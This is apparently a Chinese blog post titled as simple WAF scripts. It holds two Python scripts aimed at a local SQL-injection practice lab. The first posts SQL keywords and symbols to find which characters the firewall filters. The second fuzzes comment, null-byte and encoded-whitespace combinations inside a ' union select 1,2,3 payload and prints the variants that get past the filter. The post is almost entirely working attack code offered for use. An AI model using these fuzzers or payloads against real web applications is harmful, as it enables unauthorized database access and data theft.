关于waf的简单脚本 1，检测屏蔽哪些字符。2，fuzz批量测试

1

import requests

sql_char = ['select', 'union', 'and', 'or', '', 'select union', 'sleep', 'like', 'group', 'order', 'by', 'ascii',
            'updatexml', 'handler', 'insert', '\\', '\ ', '@', 'all', '#', '-', '"', ')', '--', '+', '=', '/',' ']

url = "http://192.168.126.132:5001/sqli/less-1/index,php/"

header = {

    'Host': '192.168.126.132:5001',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded'
}
for char in sql_char:
    post_data = "query=test" + char + "&submit2=sbumit"
    res = requests.post(url, data=post_data, headers=header)
    if 'Illegal Char' in res.text:
        print("过滤字符: {0}".format(char))
    else:
        print("通过: {0}".format(char))

2

import requests

fuzz_a = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00','%0a','%23','%20']
fuzz_b = ['',' ']
fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0g','%0h','%0i','%0j','%0h']
FUZZ = fuzz_a + fuzz_b + fuzz_c

def work(url):
    for a in FUZZ:
        for b in FUZZ:
            for c in FUZZ:
                exp = url + "%27%20union" + "--%20asdasd" + a + b + c + "select" + "%201,2,3%20%23"

                response = requests.get(url=exp).content

                if "waf" in str(response) or "error" in str(response):
                    pass
                else:
                    print(exp)

if __name__ == '__main__':
    url = "http://192.168.126.132:5001/sqli/Less-1/index.php?id=-1"
    work(url)